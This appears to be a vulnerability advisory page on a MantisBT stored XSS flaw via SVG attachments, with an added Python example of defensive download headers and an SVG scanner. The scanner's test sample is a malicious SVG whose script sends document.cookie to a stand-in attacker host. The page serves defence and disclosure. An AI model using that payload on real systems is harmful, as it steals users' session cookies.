Vulnerability Information
Although we use advanced large-model technology, its output may still contain inaccurate or outdated information. Shenlong tries to ensure data accuracy, but please verify every detail against your own environment before acting on it.
Vulnerability Title
N/A
Vulnerability Description
An XSS vulnerability in MantisBT before 2.25.5 allows remote attackers to attach crafted SVG documents to issue reports or bugnotes. When a user or an admin clicks on the attachment, file_download.php serves the SVG inline, so the browser renders it in a tab instead of downloading it as a file; any script embedded in the SVG then executes in the browser under the MantisBT site's origin, which is what makes this a cross-site scripting issue rather than a harmless file download.
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
MantisBT cross-site scripting vulnerability
Vulnerability Description
MantisBT is a web-based open-source bug tracking system from the MantisBT team. It provides project management and defect tracking through a web interface. Versions of MantisBT before 2.25.5 contain a security vulnerability: remote attackers can attach crafted SVG documents to issue reports or bugnotes. When a user or an administrator clicks the attachment, file_download.php opens the SVG document in a browser tab instead of downloading it as a file, causing the JavaScript it contains to execute.
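The two descriptions above name the root cause (an attachment download handler that serves active content inline) without showing what a safe handler looks like. The following is an added example, written for this page and not code from MantisBT or its file_download.php: a download-header policy that forces a download for anything a browser would render and execute (SVG, HTML, XML, JavaScript), plus a secondary check that flags SVG uploads carrying script, event-handler attributes or javascript: links. Function names, the inline-allowed list and the two sample SVG documents are assumptions constructed for the example.

```python
"""Hardened attachment-download policy (added example, not MantisBT code).

The bug described above is that an SVG attachment is served with an inline
disposition, so the browser renders it as a document and runs the script it
carries, with the bug tracker's origin. The primary fix is to force a
download for active content; scanning the SVG is defence in depth only.
"""
import re
import xml.etree.ElementTree as ET

# MIME types a browser will render as a document (and run script in) when
# served inline. Extensions are checked too, because a stored MIME type can be
# wrong or attacker-supplied.
ACTIVE_TYPES = {
    "image/svg+xml", "text/html", "application/xhtml+xml", "text/xml",
    "application/xml", "application/javascript", "text/javascript",
}
ACTIVE_EXTS = {"svg", "svgz", "html", "htm", "xhtml", "xml", "js", "mhtml"}

# Types that are safe to display in the tab (assumed allow-list).
INLINE_OK = {"image/png", "image/jpeg", "image/gif", "text/plain"}


def safe_filename(name: str) -> str:
    """Drop path components and characters that could break out of the
    Content-Disposition header value."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    base = re.sub(r'[\x00-\x1f"\\;]', "_", base)
    return base or "attachment"


def download_headers(filename: str, declared_type: str) -> dict:
    """Return the response headers for serving one attachment.

    Vulnerable pattern (what the advisory describes):
        Content-Type: image/svg+xml + Content-Disposition: inline
    Hardened: inline only for a small allow-list of passive types; everything
    else, and anything with an active extension, is forced to download.
    """
    name = safe_filename(filename)
    ctype = declared_type.split(";")[0].strip().lower()
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    headers = {
        "Content-Type": ctype,
        # Stop the browser from sniffing a "passive" type into something active.
        "X-Content-Type-Options": "nosniff",
    }
    if ctype in INLINE_OK and ctype not in ACTIVE_TYPES and ext not in ACTIVE_EXTS:
        headers["Content-Disposition"] = f'inline; filename="{name}"'
    else:
        headers["Content-Disposition"] = f'attachment; filename="{name}"'
        # Defence in depth: even if a browser were to render it, sandbox it
        # so script cannot run with the site's origin.
        headers["Content-Security-Policy"] = "sandbox"
    return headers


def svg_has_active_content(data: bytes) -> bool:
    """Flag SVG documents that carry script-capable constructs.

    Secondary check for upload time; do not rely on it instead of the header
    policy. Unparseable input is treated as unsafe. ElementTree does not
    resolve external entities, but a production deployment should still
    prefer defusedxml for untrusted input (assumption, not shown here).
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower() if isinstance(el.tag, str) else ""
        if tag in ("script", "foreignobject", "iframe", "embed", "object"):
            return True
        for attr, value in el.attrib.items():
            local = attr.split("}")[-1].lower()
            if local.startswith("on"):            # onload, onclick, ...
                return True
            if local in ("href", "src") and value.strip().lower().startswith("javascript:"):
                return True
    return False


# Constructed sample attachments for the example (not real captured files).
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
</svg>"""
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
             b'<rect width="10" height="10" fill="red"/></svg>')

if __name__ == "__main__":
    print(download_headers("diagram.svg", "image/svg+xml"))
    print(download_headers("screenshot.png", "image/png"))
    print("malicious:", svg_has_active_content(MALICIOUS_SVG))
    print("clean:", svg_has_active_content(CLEAN_SVG))
```

The header policy is the fix that matters: with `Content-Disposition: attachment` the browser saves the SVG rather than navigating to it, so there is no document in the site's origin for the script to run in. The extension check covers the case where the stored MIME type claims `image/png` for a file that is really SVG. The content scan is there to reject obvious payloads at upload time; it is not a substitute, because SVG can carry script in forms a simple walk does not catch.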
CVSS Information
N/A
Vulnerability Type
N/A